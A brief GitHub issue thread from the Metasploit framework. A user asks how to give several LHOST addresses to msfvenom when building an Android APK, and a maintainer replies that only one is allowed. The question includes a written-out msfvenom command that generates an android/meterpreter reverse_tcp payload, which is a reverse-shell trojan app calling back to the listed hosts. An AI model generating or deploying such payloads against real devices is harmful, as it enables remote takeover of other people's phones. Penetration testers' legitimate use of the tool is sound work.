### ISSUE TITLE
LHOST Android

### ISSUE THREAD

**Issue by NightRaidGamer** [rapid7/metasploit-framework#15592]
how do I configure more than one LHOST when creating an apk with msfvenom?

For ex: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10, 192.168.1.9, 192.168.1.8, xxx etc  R >/root/test.apk

what would be the correct parameter?

**Comment by bcoles** [comment]
There can be only one.

**Comment by NightRaidGamer** [comment]
> There can be only one.

ok, thank you for answering
